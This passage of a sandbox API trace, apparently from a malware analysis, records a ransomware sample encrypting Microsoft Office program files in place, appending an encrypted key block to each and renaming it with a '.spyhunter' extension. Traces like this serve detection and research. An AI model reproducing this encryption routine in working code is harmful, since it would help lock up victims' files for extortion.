(in: hFile=0xb4, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x200e, lpNumberOfBytesWritten=0x25cfaa4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cfaa4*=0x200e, lpOverlapped=0x0) returned 1 [0109.839] GetProcessHeap () returned 0x2c0000 [0109.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0109.839] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.839] WriteFile (in: hFile=0xb4, lpBuffer=0x25cfae4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfaa4, lpOverlapped=0x0 | out: lpBuffer=0x25cfae4*, lpNumberOfBytesWritten=0x25cfaa4*=0x4, lpOverlapped=0x0) returned 1 [0109.839] WriteFile (in: hFile=0xb4, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfaa4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x25cfaa4*=0x30, lpOverlapped=0x0) returned 1 [0109.839] CloseHandle (hObject=0xb4) returned 1 [0109.840] GetProcessHeap () returned 0x2c0000 [0109.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2dd0048 [0109.840] wnsprintfW (in: pszDest=0x2dd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTaskIcon.jpg.spyhunter") returned 124 [0109.840] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTaskIcon.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\projecttaskicon.jpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTaskIcon.jpg.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\projecttaskicon.jpg.spyhunter")) returned 1 [0109.840] GetProcessHeap () returned 0x2c0000 [0109.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2dd0048 | out: hHeap=0x2c0000) returned 1 [0109.840] GetProcessHeap () returned 0x2c0000 [0109.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0109.841] GetProcessHeap () returned 0x2c0000 [0109.841] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e25b30 | out: hHeap=0x2c0000) returned 1 [0109.841] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfae8 | out: pbBuffer=0x25cfae8) returned 1 [0109.841] GetProcessHeap () returned 0x2c0000 [0109.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0109.841] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cfae0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cfae0*=0x30) returned 1 [0109.841] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\WSS_DocLib.ico" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\wss_doclib.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0109.841] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\WSS_DocLib.ico") returned 78 [0109.841] StrStrW (lpFirst="WSS_DocLib.ico", lpSrch=".txt") returned 0x0 [0109.841] GetProcessHeap () returned 0x2c0000 [0109.841] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0109.841] ReadFile (in: hFile=0xb4, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfaa4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cfaa4*=0xb2e, lpOverlapped=0x0) returned 1 [0109.942] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffff4d2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0109.942] WriteFile (in: hFile=0xb4, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xb2e, lpNumberOfBytesWritten=0x25cfaa4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cfaa4*=0xb2e, lpOverlapped=0x0) returned 1 [0109.942] GetProcessHeap () returned 0x2c0000 [0109.942] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0109.942] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.942] WriteFile (in: hFile=0xb4, lpBuffer=0x25cfae4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfaa4, lpOverlapped=0x0 | out: lpBuffer=0x25cfae4*, lpNumberOfBytesWritten=0x25cfaa4*=0x4, lpOverlapped=0x0) returned 1 [0109.942] WriteFile (in: hFile=0xb4, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfaa4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x25cfaa4*=0x30, lpOverlapped=0x0) returned 1 [0109.942] CloseHandle (hObject=0xb4) returned 1 [0109.943] GetProcessHeap () returned 0x2c0000 [0109.943] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cfa3a8 [0109.943] wnsprintfW (in: pszDest=0x2cfa3a8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\WSS_DocLib.ico.spyhunter") returned 88 [0109.943] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\WSS_DocLib.ico" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\wss_doclib.ico"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolIcons\\WSS_DocLib.ico.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\toolicons\\wss_doclib.ico.spyhunter")) returned 1 [0109.943] GetProcessHeap () returned 0x2c0000 [0109.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cfa3a8 | out: hHeap=0x2c0000) returned 1 [0109.943] GetProcessHeap () returned 0x2c0000 [0109.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0109.943] GetProcessHeap () returned 0x2c0000 [0109.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c9fff8 | out: hHeap=0x2c0000) returned 1 [0109.944] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfae0 | out: pbBuffer=0x25cfae0) returned 1 [0109.944] GetProcessHeap () returned 0x2c0000 [0109.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0109.944] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cfad8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cfad8*=0x30) returned 1 [0109.944] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\IMWIZ.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\imwiz.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0109.953] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\IMWIZ.DLL") returned 56 [0109.953] StrStrW (lpFirst="IMWIZ.DLL", lpSrch=".txt") returned 0x0 [0109.953] GetProcessHeap () returned 0x2c0000 [0109.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0109.953] ReadFile (in: hFile=0xb4, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfa9c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cfa9c*=0x2800, lpOverlapped=0x0) returned 1 [0109.970] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0109.970] WriteFile (in: hFile=0xb4, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cfa9c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cfa9c*=0x2800, lpOverlapped=0x0) returned 1 [0109.970] GetProcessHeap () returned 0x2c0000 [0109.970] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0109.970] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.970] WriteFile (in: hFile=0xb4, lpBuffer=0x25cfadc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfa9c, lpOverlapped=0x0 | out: lpBuffer=0x25cfadc*, lpNumberOfBytesWritten=0x25cfa9c*=0x4, lpOverlapped=0x0) returned 1 [0109.974] WriteFile (in: hFile=0xb4, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfa9c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x25cfa9c*=0x30, lpOverlapped=0x0) returned 1 [0109.974] CloseHandle (hObject=0xb4) returned 1 [0109.974] GetProcessHeap () returned 0x2c0000 [0109.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2dd0048 [0109.975] wnsprintfW (in: pszDest=0x2dd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\IMWIZ.DLL.spyhunter") returned 66 [0109.975] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\IMWIZ.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\imwiz.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\IMWIZ.DLL.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\imwiz.dll.spyhunter")) returned 1 [0109.975] GetProcessHeap () returned 0x2c0000 [0109.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2dd0048 | out: hHeap=0x2c0000) returned 1 [0109.975] GetProcessHeap () returned 0x2c0000 [0109.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0109.975] GetProcessHeap () returned 0x2c0000 [0109.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x332180 | out: hHeap=0x2c0000) returned 1 [0109.976] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfae0 | out: pbBuffer=0x25cfae0) returned 1 [0109.976] GetProcessHeap () returned 0x2c0000 [0109.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0109.976] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cfad8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cfad8*=0x30) returned 1 [0109.976] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\IMWDD.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\imwdd.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0109.977] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\IMWDD.DLL") returned 56 [0109.977] StrStrW (lpFirst="IMWDD.DLL", lpSrch=".txt") returned 0x0 [0109.977] GetProcessHeap () returned 0x2c0000 [0109.977] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0109.977] ReadFile (in: hFile=0xb4, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfa9c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cfa9c*=0x2800, lpOverlapped=0x0) returned 1 [0109.989] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0109.989] WriteFile (in: hFile=0xb4, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cfa9c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cfa9c*=0x2800, lpOverlapped=0x0) returned 1 [0109.989] GetProcessHeap () returned 0x2c0000 [0109.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0109.989] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.989] WriteFile (in: hFile=0xb4, lpBuffer=0x25cfadc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfa9c, lpOverlapped=0x0 | out: lpBuffer=0x25cfadc*, lpNumberOfBytesWritten=0x25cfa9c*=0x4, lpOverlapped=0x0) returned 1 [0110.022] WriteFile (in: hFile=0xb4, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfa9c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x25cfa9c*=0x30, lpOverlapped=0x0) returned 1 [0110.022] CloseHandle (hObject=0xb4) returned 1 [0110.022] GetProcessHeap () returned 0x2c0000 [0110.022] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2dd0048 [0110.022] wnsprintfW (in: pszDest=0x2dd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\IMWDD.DLL.spyhunter") returned 66 [0110.022] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\IMWDD.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\imwdd.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\IMWDD.DLL.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\imwdd.dll.spyhunter")) returned 1 [0110.023] GetProcessHeap () returned 0x2c0000 [0110.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2dd0048 | out: hHeap=0x2c0000) returned 1 [0110.023] GetProcessHeap () returned 0x2c0000 [0110.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0110.023] GetProcessHeap () returned 0x2c0000 [0110.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3320c0 | out: hHeap=0x2c0000) returned 1 [0110.023] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfad8 | out: pbBuffer=0x25cfad8) returned 1 [0110.023] GetProcessHeap () returned 0x2c0000 [0110.023] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0110.023] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cfad0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cfad0*=0x30) returned 1 [0110.023] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\IMCOMMON.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\imcommon.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0110.024] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\IMCOMMON.DLL") returned 59 [0110.024] StrStrW (lpFirst="IMCOMMON.DLL", lpSrch=".txt") returned 0x0 [0110.024] GetProcessHeap () returned 0x2c0000 [0110.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0110.024] ReadFile (in: hFile=0xb4, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfa94, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cfa94*=0x2800, lpOverlapped=0x0) returned 1 [0110.036] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0110.036] WriteFile (in: hFile=0xb4, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cfa94, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cfa94*=0x2800, lpOverlapped=0x0) returned 1 [0110.037] GetProcessHeap () returned 0x2c0000 [0110.037] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0110.037] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0110.037] WriteFile (in: hFile=0xb4, lpBuffer=0x25cfad4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfa94, lpOverlapped=0x0 | out: lpBuffer=0x25cfad4*, lpNumberOfBytesWritten=0x25cfa94*=0x4, lpOverlapped=0x0) returned 1 [0110.039] WriteFile (in: hFile=0xb4, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfa94, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x25cfa94*=0x30, lpOverlapped=0x0) returned 1 [0110.039] CloseHandle (hObject=0xb4) returned 1 [0110.039] GetProcessHeap () returned 0x2c0000 [0110.039] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2dd0048 [0110.039] wnsprintfW (in: pszDest=0x2dd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\IMCOMMON.DLL.spyhunter") returned 69 [0110.039] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\IMCOMMON.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\imcommon.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\IMCOMMON.DLL.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\imcommon.dll.spyhunter")) returned 1 [0110.040] GetProcessHeap () returned 0x2c0000 [0110.040] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2dd0048 | out: hHeap=0x2c0000) returned 1 [0110.040] GetProcessHeap () returned 0x2c0000 [0110.040] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0110.040] GetProcessHeap () returned 0x2c0000 [0110.040] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x331ac0 | out: hHeap=0x2c0000) returned 1 [0110.040] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfad8 | out: pbBuffer=0x25cfad8) returned 1 [0110.040] GetProcessHeap () returned 0x2c0000 [0110.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0110.040] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cfad0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cfad0*=0x30) returned 1 [0110.040] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\IEContentService.exe" (normalized: "c:\\program files\\microsoft office\\office14\\iecontentservice.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0110.041] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\IEContentService.exe") returned 67 [0110.041] StrStrW (lpFirst="IEContentService.exe", lpSrch=".txt") returned 0x0 [0110.041] GetProcessHeap () returned 0x2c0000 [0110.041] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0110.041] ReadFile (in: hFile=0xb4, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfa94, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cfa94*=0x2800, lpOverlapped=0x0) returned 1 [0110.051] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0110.051] WriteFile (in: hFile=0xb4, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cfa94, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cfa94*=0x2800, lpOverlapped=0x0) returned 1 [0110.051] GetProcessHeap () returned 0x2c0000 [0110.051] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0110.051] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0110.052] WriteFile (in: hFile=0xb4, lpBuffer=0x25cfad4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfa94, lpOverlapped=0x0 | out: lpBuffer=0x25cfad4*, lpNumberOfBytesWritten=0x25cfa94*=0x4, lpOverlapped=0x0) returned 1 [0110.056] WriteFile (in: hFile=0xb4, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfa94, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x25cfa94*=0x30, lpOverlapped=0x0) returned 1 [0110.056] CloseHandle (hObject=0xb4) returned 1 [0110.056] GetProcessHeap () returned 0x2c0000 [0110.056] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2dd0048 [0110.056] wnsprintfW (in: pszDest=0x2dd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\IEContentService.exe.spyhunter") returned 77 [0110.056] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\IEContentService.exe" (normalized: "c:\\program files\\microsoft office\\office14\\iecontentservice.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\IEContentService.exe.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\iecontentservice.exe.spyhunter")) returned 1 [0110.057] GetProcessHeap () returned 0x2c0000 [0110.057] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2dd0048 | out: hHeap=0x2c0000) returned 1 [0110.057] GetProcessHeap () returned 0x2c0000 [0110.057] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0110.057] GetProcessHeap () returned 0x2c0000 [0110.057] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cadea8 | out: hHeap=0x2c0000) returned 1 [0110.057] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfad0 | out: pbBuffer=0x25cfad0) returned 1 [0110.057] GetProcessHeap () returned 0x2c0000 [0110.057] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0110.057] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cfac8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cfac8*=0x30) returned 1 [0110.058] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\IEAWSDC.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\ieawsdc.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0110.820] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\IEAWSDC.DLL") returned 58 [0110.821] StrStrW (lpFirst="IEAWSDC.DLL", lpSrch=".txt") returned 0x0 [0110.821] GetProcessHeap () returned 0x2c0000 [0110.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0110.821] ReadFile (in: hFile=0x154, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfa8c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cfa8c*=0x2800, lpOverlapped=0x0) returned 1 [0110.852] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0110.852] WriteFile (in: hFile=0x154, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cfa8c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cfa8c*=0x2800, lpOverlapped=0x0) returned 1 [0110.852] GetProcessHeap () returned 0x2c0000 [0110.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0110.852] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0110.852] WriteFile (in: hFile=0x154, lpBuffer=0x25cfacc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfa8c, lpOverlapped=0x0 | out: lpBuffer=0x25cfacc*, lpNumberOfBytesWritten=0x25cfa8c*=0x4, lpOverlapped=0x0) returned 1 [0110.953] WriteFile (in: hFile=0x154, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfa8c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x25cfa8c*=0x30, lpOverlapped=0x0) returned 1 [0110.953] CloseHandle (hObject=0x154) returned 1 [0110.953] GetProcessHeap () returned 0x2c0000 [0110.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cfa3a8 [0110.953] wnsprintfW (in: pszDest=0x2cfa3a8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\IEAWSDC.DLL.spyhunter") returned 68 [0110.953] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\IEAWSDC.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\ieawsdc.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\IEAWSDC.DLL.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\ieawsdc.dll.spyhunter")) returned 1 [0110.954] GetProcessHeap 